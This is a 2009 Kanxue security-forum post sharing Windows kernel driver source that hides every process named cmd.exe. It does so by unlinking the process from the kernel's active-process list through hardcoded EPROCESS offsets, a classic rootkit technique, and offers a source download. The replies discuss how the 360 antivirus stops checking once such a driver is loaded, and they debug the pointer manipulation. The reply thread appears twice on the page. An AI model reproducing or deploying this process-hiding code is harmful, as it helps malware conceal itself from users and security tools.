[原创]写了个驱动，隐藏cmd.exe进程（高手别看）-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]写了个驱动，隐藏cmd.exe进程（高手别看）

发表于: 2009-12-6 01:42 9420

[原创]写了个驱动，隐藏cmd.exe进程（高手别看）

inhell

2009-12-6 01:42

9420

#include "Driver.h"
char* GetAllProcessListName(ULONG);
#pragma INITCODE
VOID getProccess()
{
     
//  DbgPrint("this is getProcess()");
    ULONG  Address;
    ULONG  oldAddress;
    Address = (ULONG)PsGetCurrentProcess();
    Address += 0x88;
    oldAddress = Address;
//  DbgPrint("this is getProcess()");
    char *processName;
    LIST_ENTRY*  listEntry;
    do
    {
            processName = GetAllProcessListName(Address);
    //  KdPrint((" name:%s\n",processName));
        if(!strcmp(processName, "cmd.exe"))
        {
 
            KdPrint(("this is my hidden name:%s\n",processName));
            listEntry = (LIST_ENTRY *) (Address);
            *((ULONG*)listEntry->Blink) = (ULONG)listEntry->Flink;
            *((ULONG*)listEntry->Flink+1) = (ULONG)listEntry->Blink;
        }
        Address = *(ULONG*)Address;
         
    }while(oldAddress != Address);      
 
}
char*  GetAllProcessListName(ULONG Address)
{
    Address -= 0x88;
    ULONG PID;
    char *processName;
    PID = *(int*)(Address + 0x84);
    processName = (char*)(Address + 0x174);
    //KdPrint(("PID:%d", PID));
    return processName;
}

登录后可查看完整内容

[注意]看雪招聘，专注安全领域的专业人才平台！

上传的附件：

hiddenps.rar （3.37kb，203次下载）

收藏・4

免费・7

支持

赞赏记录

参与人

雪币

留言

时间

Youlor

为你点赞~

2024-3-23 01:03

QinBeast

为你点赞~

2024-1-7 04:29

伟叔叔

为你点赞~

2024-1-6 05:51

shinratensei

为你点赞~

2023-12-8 00:30

PLEBFE

为你点赞~

2023-11-27 00:33

心游尘世外

为你点赞~

2023-11-14 00:32

飘零丶

为你点赞~

2023-11-4 01:09

最新回复 (12)
inhell 雪币： 245 活跃值： (11) 能力值： ( LV3，RANK：20 ) 在线值：发帖 23 回帖 77 粉丝 0 关注私信	inhell 2 楼问个问题，为啥360会不显示这个隐藏的进程啊？我觉的应该显示的啊！是有意不显示的！上传的附件： w.jpg （158.46kb，25次下载） 2009-12-6 02:23 0
天外来客雪币： 279 活跃值： (33) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 45 粉丝 0 关注私信	天外来客 3 楼 360是你进了ring0后就不管了，所以只要驱动加载成功，是可以起作用的，但加载时会拦截。 2009-12-6 09:00 0
feierin 雪币： 474 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 314 粉丝 0 关注私信	feierin 4 楼拿源码了，谢谢了哦 2009-12-6 09:42 0
mszjk 雪币： 34 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 20 回帖 542 粉丝 0 关注私信	mszjk 5 楼我看到楼主混乱的桌面,哈哈... 2009-12-6 11:29 0
ImHolly 雪币： 412 活跃值： (30) 能力值： ( LV5，RANK：70 ) 在线值：发帖 6 回帖 293 粉丝 1 关注私信	ImHolly 1 6 楼楼主在真机上试。。。。 2009-12-6 12:41 0
inhell 雪币： 245 活跃值： (11) 能力值： ( LV3，RANK：20 ) 在线值：发帖 23 回帖 77 粉丝 0 关注私信	inhell 7 楼虚拟机上试的啊！ 360不管驱动干什么，只管加载驱动那块？ 2009-12-6 15:34 0
dayang 雪币： 220 活跃值： (836) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 938 粉丝 1 关注私信	dayang 8 楼现在X星也开始疯狂拦截驱动了。什么驱动都拦截，郁闷。 2009-12-6 23:05 0
nmgg 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	nmgg 9 楼第一贴发给你来了`` 2009-12-7 00:28 0
百折不挠雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 36 回帖 139 粉丝 0 关注私信	百折不挠 10 楼没有处理cmd.exe在链尾的情况，这样会不会蓝屏？ ((ULONG)listEntry->Blink) = (ULONG)listEntry->Flink; ((ULONG)listEntry->Flink+1) = (ULONG)listEntry->Blink; 这两句中的第二句看不明白，可以指点一下吗？我觉得第二句应该不需要了。因为第一句就把listEntry的指针向后移了，Fink是指下一个指针，((ULONG)listEntry->Flink+1) 是什么意思？为什么要指向Bink,这样的话，这个结构不是两个指针都指在同一个地方？改成？ ((ULONG)listEntry->Blink) = ((ULONG)listEntry->Blink+1) ; ((ULONG)listEntry->Flink) = ((ULONG)listEntry->Flink+1); 行吗？ 2009-12-7 09:00 0
inhell 雪币： 245 活跃值： (11) 能力值： ( LV3，RANK：20 ) 在线值：发帖 23 回帖 77 粉丝 0 关注私信	inhell 11 楼我很菜啊， ((ULONG)listEntry->Blink) = ((ULONG)listEntry->Blink+1) ; 这就变成前一个listentity-->Flink 指向了自己的Blink 是吧？自己指自己？ (ULONG*)listEntry->Blink+1 这句就不对！！Blink+1 变成什么了？我觉的啊！flink+1 = blink 2009-12-7 10:02 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 49 关注私信	achillis 15 12 楼   双向环状链表，无所谓头，无所谓尾。直接RemoveEntryList不就行了，像楼主这么写比较容易混乱，自己清楚还好，自己都不清楚，别人就更搞不清楚了~ 2009-12-7 10:42 0
bnbpbl 雪币： 102 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 20 粉丝 0 关注私信	bnbpbl 13 楼学习驱动需要什么知识 2009-12-23 00:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

inhell

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (12)
inhell 雪币： 245 活跃值： (11) 能力值： ( LV3，RANK：20 ) 在线值：发帖 23 回帖 77 粉丝 0 关注私信	inhell 2 楼问个问题，为啥360会不显示这个隐藏的进程啊？我觉的应该显示的啊！是有意不显示的！上传的附件： w.jpg （158.46kb，25次下载） 2009-12-6 02:23 0
天外来客雪币： 279 活跃值： (33) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 45 粉丝 0 关注私信	天外来客 3 楼 360是你进了ring0后就不管了，所以只要驱动加载成功，是可以起作用的，但加载时会拦截。 2009-12-6 09:00 0
feierin 雪币： 474 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 314 粉丝 0 关注私信	feierin 4 楼拿源码了，谢谢了哦 2009-12-6 09:42 0
mszjk 雪币： 34 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 20 回帖 542 粉丝 0 关注私信	mszjk 5 楼我看到楼主混乱的桌面,哈哈... 2009-12-6 11:29 0
ImHolly 雪币： 412 活跃值： (30) 能力值： ( LV5，RANK：70 ) 在线值：发帖 6 回帖 293 粉丝 1 关注私信	ImHolly 1 6 楼楼主在真机上试。。。。 2009-12-6 12:41 0
inhell 雪币： 245 活跃值： (11) 能力值： ( LV3，RANK：20 ) 在线值：发帖 23 回帖 77 粉丝 0 关注私信	inhell 7 楼虚拟机上试的啊！ 360不管驱动干什么，只管加载驱动那块？ 2009-12-6 15:34 0
dayang 雪币： 220 活跃值： (836) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 938 粉丝 1 关注私信	dayang 8 楼现在X星也开始疯狂拦截驱动了。什么驱动都拦截，郁闷。 2009-12-6 23:05 0
nmgg 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	nmgg 9 楼第一贴发给你来了`` 2009-12-7 00:28 0
百折不挠雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 36 回帖 139 粉丝 0 关注私信	百折不挠 10 楼没有处理cmd.exe在链尾的情况，这样会不会蓝屏？ ((ULONG)listEntry->Blink) = (ULONG)listEntry->Flink; ((ULONG)listEntry->Flink+1) = (ULONG)listEntry->Blink; 这两句中的第二句看不明白，可以指点一下吗？我觉得第二句应该不需要了。因为第一句就把listEntry的指针向后移了，Fink是指下一个指针，((ULONG)listEntry->Flink+1) 是什么意思？为什么要指向Bink,这样的话，这个结构不是两个指针都指在同一个地方？改成？ ((ULONG)listEntry->Blink) = ((ULONG)listEntry->Blink+1) ; ((ULONG)listEntry->Flink) = ((ULONG)listEntry->Flink+1); 行吗？ 2009-12-7 09:00 0
inhell 雪币： 245 活跃值： (11) 能力值： ( LV3，RANK：20 ) 在线值：发帖 23 回帖 77 粉丝 0 关注私信	inhell 11 楼我很菜啊， ((ULONG)listEntry->Blink) = ((ULONG)listEntry->Blink+1) ; 这就变成前一个listentity-->Flink 指向了自己的Blink 是吧？自己指自己？ (ULONG*)listEntry->Blink+1 这句就不对！！Blink+1 变成什么了？我觉的啊！flink+1 = blink 2009-12-7 10:02 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 49 关注私信	achillis 15 12 楼   双向环状链表，无所谓头，无所谓尾。直接RemoveEntryList不就行了，像楼主这么写比较容易混乱，自己清楚还好，自己都不清楚，别人就更搞不清楚了~ 2009-12-7 10:42 0
bnbpbl 雪币： 102 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 20 粉丝 0 关注私信	bnbpbl 13 楼学习驱动需要什么知识 2009-12-23 00:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]写了个驱动，隐藏cmd.exe进程（高手别看）

账号登录 验证码登录

账号登录

验证码登录